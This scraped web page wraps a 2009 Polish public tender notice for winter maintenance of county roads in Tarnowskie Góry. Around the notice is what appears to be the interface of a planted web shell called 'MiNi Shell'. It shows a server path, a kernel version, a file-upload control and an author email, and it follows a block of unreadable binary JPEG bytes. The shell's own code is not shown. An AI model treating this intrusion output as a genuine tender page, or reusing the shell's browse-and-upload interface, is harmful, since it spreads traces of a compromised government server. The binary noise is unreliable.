JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090107/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090107/6271-N-2009.html

<p class="kh_header"><b>Tarnowskie Góry: Utrzymanie nawierzchni dróg powiatowych na terenie Powiatu Tarnogórskiego będących w administracji tutejszego Zarządu Dróg w okresie Akcji Zima</b><br>
<b>Numer ogłoszenia: 6271 - 2009; data zamieszczenia: 07.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg  Powiatowych w Tarnowskich Górach , ul. Pyskowicka 54, 42-612 Tarnowskie Góry, woj. śląskie, tel. 032 2854862, faks 032 2854862.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdp.tgory.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie nawierzchni dróg powiatowych na terenie Powiatu Tarnogórskiego będących w administracji tutejszego Zarządu Dróg w okresie Akcji Zima.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:

A) GMINĘ TARNOWSKIE GÓRY:

a) utrzymanie nawierzchni dróg powiatowych w okresie Akcji Zima w standardzie II  (258,0 tyś. m2 + chodnik na wiadukcie - załącznik nr 9 do SIWZ);
b) utrzymanie nawierzchni dróg powiatowych w okresie Akcji Zima w standardzie III  (81,9 z tyś. m2 - załącznik nr 9 do SIWZ) lub 
c) pełnienie dozoru na drogach objętych zimowym utrzymaniem (339,9 tys. m2 + chodnik na wiadukcie).
Ponadto zamówienie obejmuje: wywóz nadmiaru śniegu na odległość do 10 km, mechaniczne oczyszczanie dróg powiatowych. 

B) GMINĘ RADZIONKÓW: 

d) utrzymanie nawierzchni dróg powiatowych w okresie Akcji Zima w standardzie II  (95,1 tyś. m2 - załącznik nr 9 do SIWZ);
e) pełnienie dozoru na drogach objętych zimowym utrzymaniem (95,1 tys. m2).
Ponadto zamówienie obejmuje: wywóz nadmiaru śniegu na odległość do 10 km, mechaniczne oczyszczanie dróg powiatowych. 

C) GMINĘ KRUPSKI MŁYN:

f) utrzymanie nawierzchni dróg powiatowych w okresie Akcji Zima w standardzie II (57,0 tyś. m2 - załącznik nr 9 do SIWZ);
g) utrzymanie nawierzchni dróg powiatowych w okresie Akcji Zima w standardzie III  (18,0 z tyś. m2 - załącznik nr 9 do SIWZ) lub 
h) pełnienie dozoru na drogach objętych zimowym utrzymaniem (75,0 tys. m2).
Ponadto zamówienie obejmuje: wywóz nadmiaru śniegu na odległość do 10 km, mechaniczne oczyszczanie dróg powiatowych. 

D) GMINĘ KALETY:

i) utrzymanie nawierzchni dróg powiatowych w okresie Akcji Zima w standardzie II (39,3 tyś. m2 - załącznik nr 9 do SIWZ);
j) utrzymanie nawierzchni dróg powiatowych w okresie Akcji Zima w standardzie III  (62,9 tyś. m2 - załącznik nr 9 do SIWZ) lub 
k) pełnienie dozoru na drogach objętych zimowym utrzymaniem (102,2 tys. m2).
Ponadto zamówienie obejmuje: wywóz nadmiaru śniegu na odległość do 10 km, mechaniczne oczyszczanie dróg powiatowych. 

E) GMINĘ ZBROSŁAWICE:

l) utrzymanie nawierzchni dróg powiatowych w okresie Akcji Zima w standardzie II  (121,1 tyś. m2 - załącznik nr 9 do SIWZ);
m) utrzymanie nawierzchni dróg powiatowych w okresie Akcji Zima w standardzie III  (300,7 z tyś. m2 - załącznik nr 9 do SIWZ) lub 
n) pełnienie dozoru na drogach objętych zimowym utrzymaniem (421,8 tys. m2).
Ponadto zamówienie obejmuje: wywóz nadmiaru śniegu na odległość do 10 km, mechaniczne oczyszczanie dróg powiatowych. 

F) GMINY ŚWIERKLANIEC ORAZ MIASTECZKO ŚLĄSKIE:

o) utrzymanie nawierzchni dróg powiatowych w okresie Akcji Zima w standardzie II (44,3 tyś. m2 - załącznik nr 9 do SIWZ);
p) utrzymanie nawierzchni dróg powiatowych w okresie Akcji Zima w standardzie III  (99,2 tyś. m2 - załącznik nr 9 do SIWZ) lub 
q) pełnienie dozoru na drogach objętych zimowym utrzymaniem (143,5 tys. m2).
Ponadto zamówienie obejmuje: wywóz nadmiaru śniegu na odległość do 10 km, mechaniczne oczyszczanie dróg powiatowych. 

G) GMINĘ OŻAROWICE:

r) utrzymanie nawierzchni dróg powiatowych w okresie Akcji Zima w standardzie II (11,7 tyś. m2 - załącznik nr 9 do SIWZ);
s) utrzymanie nawierzchni dróg powiatowych w okresie Akcji Zima w standardzie III (167,3 tyś. m2 - załącznik nr 9 do SIWZ) lub
t) pełnienie dozoru na drogach objętych zimowym utrzymaniem (179,0 tys. m2).
Ponadto zamówienie obejmuje: wywóz nadmiaru śniegu na odległość do 10 km, mechaniczne oczyszczanie dróg powiatowych. 

H) GMINĘ TWORÓG:

u) utrzymanie nawierzchni dróg powiatowych w okresie Akcji Zima w standardzie II (57,1 tyś. m2 - załącznik nr 9 do SIWZ);
v) utrzymanie nawierzchni dróg powiatowych w okresie Akcji Zima w standardzie III (145,6 tyś. m2 - załącznik nr 9 do SIWZ) lub
w) pełnienie dozoru na drogach objętych zimowym utrzymaniem (202,7 tys. m2).
Ponadto zamówienie obejmuje: wywóz nadmiaru śniegu na odległość do 10 km, mechaniczne oczyszczanie dróg powiatowych.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2, 90.61.20.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 69.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Zgodnie z art. 22 ustawy Pzp o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
a) Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
b) Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonywania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
c) Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 
d) Nie są wykluczeni z postępowania na podstawie art. 24 ust 1 i 2 Ustawy Pzp;
2. Zamawiający ustala następujące szczegółowe warunki udziału w postępowaniu:
2.1. W zakresie warunku wskazanego w punkcie a):
a) Zezwolenie na prowadzenie działalności w zakresie transportu odpadów komunalnych w trybie ustawy z dnia 27.04.2001r. o odpadach (Dz. U. z 2001r. Nr 62, Poz. 628 z późn. zm.). Zezwolenie winno zawierać co najmniej odpady sklasyfikowane pod pozycją 20 03 03 - Odpady z czyszczenia ulic i placów.
2.2. W zakresie warunku wskazanego w punkcie b):
a) Posiadanie doświadczenia w prowadzeniu akcji zima przez minimum 2 sezony w zakresie porównywalnym z przedmiotem zamówienia oraz posiadanie doświadczenia w zakresie pozimowego oczyszczania dróg w minimum 1 sezonie (należy załączyć wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie ).
- każda z przedstawionych usług powinna obejmować zimowe utrzymanie dróg o łącznej powierzchni utrzymania zimowego -  minimum 1 400 000  m2
- każda z przedstawionych usług powinna obejmować pozimowe oczyszczanie dróg o łącznej powierzchni oczyszczania - minimum 350 000  m2. Wykazane usługi muszą być poparte dokumentami potwierdzającymi, że zostały wykonane należycie.
b) wykazanie, iż wykonawca dysponuje osobami zdolnymi do wykonania zamówienia jn.:
- kierowcy ze stosownymi uprawnieniami w ilości minimum 2 osób na każdą jednostkę sprzętową, z czego co najmniej 50 % załogi powinno posiadać minimum 2 letnie doświadczenie w pracy w akcji zima,
- 2 operatorów ładowarki ze stosownymi uprawnieniami do obsługi posiadanego sprzętu, 
- 3 dyspozytorów z czego 2 z minimum 3 letnim doświadczeniem w prowadzeniu akcji zima oraz 1 osoba nadzorująca z minimum 3 letnim doświadczeniem w prowadzeniu akcji zima. 
Osoba(y) nadzorujące prace, dyspozytorzy, operatorzy ładowarek oraz kierowcy wini być wymienieni z imienia i nazwiska wraz z podaniem doświadczenia zawodowego. 
W przypadku składania oferty przez podmioty występujące wspólnie ww. warunek podmioty te mogą spełniać łącznie.
c) wykazanie, iż wykonawca dysponuje co najmniej narzędziami i urządzeniami równoważnymi jn:
- Wytwornica do przygotowania roztworu solanki ze zbiornikiem minimum 5 m3 - 1 szt;
- Pojemniki do przechowywania piasku wykonane z tworzywa sztucznego z pokrywą, o  pojemności minimum 300 l - w ilościach minimum 10 szt - zgodnie z załącznikiem nr 5 do SIWZ;
- Pługo - posypywarki - o szerokości płużenia minimum 2,7 m i objętości zasobnika 4 m3 - 16 szt. 3 szt.  pługo - posypywarek winny być wyposażone w urządzenie rejestrujące pracę posypywarki i pługu, zapisujące dane w pamięci pulpitu sterującego oraz moduł umożliwiający zastosowanie drukarki oraz programu komputerowego, jak również archiwizację i odtworzenie danych na temat położenia i pracy pługo - posypywarek. 
Urządzenie powinno rejestrować:
- Czas w którym odbywa się posypywanie; 
- Trasę przebytą przez pojazd;
- Stosowaną dawkę materiału sypkiego;
- Szerokość posypywania;
- Zużycie materiałów do zwalczania śliskości po każdej akcji oraz łączny czas pracy.
Pojazdy powinny być również wyposażone w odpowiednie urządzenie umożliwiające sczytywanie zarejestrowanych parametrów pracy posypywarek. Dane te wykonawca będzie dostarczać zamawiającemu w formie elektronicznej lub na elektronicznych nośnikach danych. 
Dane powinny być możliwe do odtworzenia w postaci tabelarycznych zestawień. Dodatkowo 3 pługo -posypywarki powinny być wyposażone w urządzenie typu GPS, odpowiedni moduł komunikacyjny oraz nadajnik, który przez siec komórkową przesyłać będzie dane droga internetową do komputera zamawiającego. Urządzenie ma rejestrować następujące parametry:
- Aktualne położenie pojazdu na e-mapie (z dokładnością 10-15 sek);
- Pracę pługu i posypywarki (opuszczony pług; posypywanie);
Program użyczony na czas realizacji umowy przez Wykonawcę Zamawiającemu winien umożliwiać zamawiającemu na komputerze obserwowanie w czasie rzeczywistym pracę sprzętu. Program również ma umożliwiać: sporządzenie raportów dotyczących pracy posypywarki i pługu, wizualizacje pokonanych tras, raport określający długość pokonanych tras oraz czas pracy pojazdów. 
- Pługo - posypywarka o  szerokości płużenia minimum 2,1 m i objętości zasobnika 2 m3 - 1 szt.
- Pługi wirnikowe - 1 szt. 
- Zamiatarki o szerokości zamiatania minimum 2 m - 3 szt. 
- Ładowarki - 2 szt. 
- Samochód ciężarowy o ładowności do 3 ton, do obsługi ręcznego oczyszczania - 1 szt.
- Samochód osobowy - patrolowy  - 1 szt. 
- Samochód samowyładowczy o ładowności min 12 t lub samochód z zabudową hakową do wywozu śniegu.
2.3. W zakresie warunku wskazanego w punkcie c) :
a) ubezpieczenie OC działalności gospodarczej na zdarzenia deliktowe oraz kontraktowe na wartość minimum  750 000,00 zł (z oznaczoną działalnością na letnie i zimowe utrzymanie ulic).         
b) posiadanie środków finansowych lub zdolności kredytowej na kwotę 750 000,00 zł..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> I. Zgodnie z art. 24 ust.2 pkt 3, art. 26 ust. 2 pzp i rozporządzeniem Prezesa Rady Ministrów z 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz. 605 z późniejszymi zmianami) zamawiający żąda złożenia następujących oświadczeń i dokumentów wraz z ofertą:  
a) W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Pzp, należy załączyć następujące dokumenty:
a) aktualny odpis z właściwego rejestru albo aktualne zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku składania oferty przez podmioty występujące wspólnie dokument musi być złożony przez każdy podmiot). 
b) aktualne zaświadczenia; właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert (w przypadku składania oferty przez podmioty występujące wspólnie dokument musi być złożony przez każdy podmiot).
c) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust 1 pkt. 4 - 8 ustawy (w przypadku składania oferty przez podmioty występujące wspólnie dokument musi być złożony przez każdy podmiot).
d) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust 1 pkt. 9 ustawy (w przypadku składania oferty przez podmioty występujące wspólnie dokument musi być złożony przez każdy podmiot).
e) aktualne zezwolenie na prowadzenie działalności w zakresie transportu odpadów, o którym mowa w art. 28 ustawy z dnia 27 kwietnia 2001 roku o odpadach (zezwolenie winno zawierać co najmniej odpady sklasyfikowane pod pozycją 20 03 03 - Odpady z czyszczenia ulic i placów oraz odpady o kodzie 02 01 82. ( w przypadku składania oferty przez podmioty występujące wspólnie, dokument ten musi być złożony przez co najmniej jeden podmiot). 
f) oświadczenie o spełnianiu przez Wykonawcę warunków określonych w art. 22 ust 1 Pzp i nie podleganiu wykluczeniu na podstawie art. 24 ust 1 i 2  Pzp - załącznik nr 2 (w przypadku składania oferty przez podmioty występujące wspólnie dokument musi być złożony przez każdy podmiot).
g) w przypadku składania oferty przez podmioty występujące wspólnie o zamówienie, pełnomocnictwo dla jednego z nich lub osoby trzeciej podpisane przez pozostałych wykonawców wspólnie ubiegających się o zamówienie. 
2. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 1 ppkt a), b), d) składa dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości (dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert);
b) nie zalega z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, (dokument powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert).
c) Nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
3. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o których mowa w pkt. 1 ppkt c) składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonych w art. 24 ust 1 pkt 4 - 8 ustawy (dokument powinien być wystawiony nie wcześniej niż  6 miesięcy przed upływem terminu składania ofert). 
4. Jeżeli w kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 2, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.
5. Dokumenty wykonawca załączy do oferty w oryginale lub jako kserokopie. W przypadku dołączenia kserokopii, winny być one potwierdzone za zgodność z oryginałem przez przedstawicieli wykonawcy, wskazanych w dokumencie rejestrowym lub w udzielonym pełnomocnictwie.
6. Na kserokopii dokumentu należy zamieścić zapis: (za zgodność z oryginałem) oraz datę i czytelny podpis lub parafkę i pieczątkę imienną. 
7. Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
8. Dokumenty  sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczone przez wykonawcę, koszty tłumaczenia dokumentów i oświadczeń na język polski ponosi Wykonawca.
2. W celu potwierdzenia, że wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, należy załączyć następujące dokumenty:
a) wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie - wzór dokumentu załączony jest do SIWZ (załącznik nr 3).
b) wykazu osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności wraz z załączonymi uprawnieniami (np. w przypadku kierowców - prawo jazdy oraz kurs przewozu rzeczy, w przypadku ładowaczy - uprawnienia do obsługi ładowarki) - druk (WYKAZ OSÓB) - Załącznik nr 4 do SIWZ. (Jeżeli w wykazie wykonawca wykaże osoby, którymi będzie dysponował, przedstawia pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia).
c) wykazu niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował wykonawca - Załącznik nr 5 do SIWZ. (Jeżeli w wykazie wykonawca wykaże narzędzia i urządzenia, którymi będzie dysponował, przedstawia pisemne zobowiązanie innych podmiotów do udostępnienia narzędzi i urządzeń niezbędnych do wykonania zamówienia):
- druk (INFORMACJE O ŚRODKACH SPRZĘTOWYCH PRZEWIDZIANYCH DO WYKONANIA ZAMÓWIENIA); 
- przedstawienie dokumentu uprawniającego do dysponowania bazą (np. akt notarialny, umowa dzierżawy) wraz z opinią sanitarną bazy,
- druk (OŚWIADCZENIE DOTYCZĄCE PUNKTU DYSPOZYTORSKIEGO) - Załącznik nr 6 do SIWZ;
- druk (WYKAZ TELEFONÓW KONTAKTOWYCH NA JEDNOSTKACH SPRZĘTOWYCH) - Załącznik nr 7 do SIWZ;
3. W celu potwierdzenia, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, należy załączyć następujące dokumenty:
a) informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w której wykonawca posiada rachunek, wystawiona nie wcześniej niż 3 miesiące przed upływem składania ofert, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy. 
b) polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na sumę nie mniejszą niż 750 000,00 zł (siedemset pięćdziesiąt tysięcy złotych).
4. Wykonawca ubiegający się o zamówienie publiczne zobowiązany jest również:
a) złożyć druk OFERTA WYKONAWCY, który należy sporządzić wg wzoru załączonego przez zamawiającego - załącznik nr 1 do SIWZ.
b) Oświadczenie o podwykonawstwie, jeżeli wykonawca zamierza powierzyć wykonanie części zamówienia wskazuje tę część (zgodnie z załącznikiem nr 13 do SIWZ).
c) Podpisany i opieczętowany wzór istotnych postanowień umownych (Załącznik nr 8 do SIWZ).
Ocena spełnienia wszystkich warunków określonych w SIWZ będzie odbywać się zgodnie z zasadą spełnia - nie spełnia na podstawie dokumentów oraz oświadczeń złożonych wraz z ofertą, z zastrzeżeniem art. 26 ust 3 ustawy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zdp.bip.info.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Tarnowskich Górach, 42 - 600 Tarnowskie Góry, ulica Pyskowicka 54.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.01.2009 godzina 08:00, miejsce: Sekreteariat Zarządu Dróg Powiatowych - pokój nr 10.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com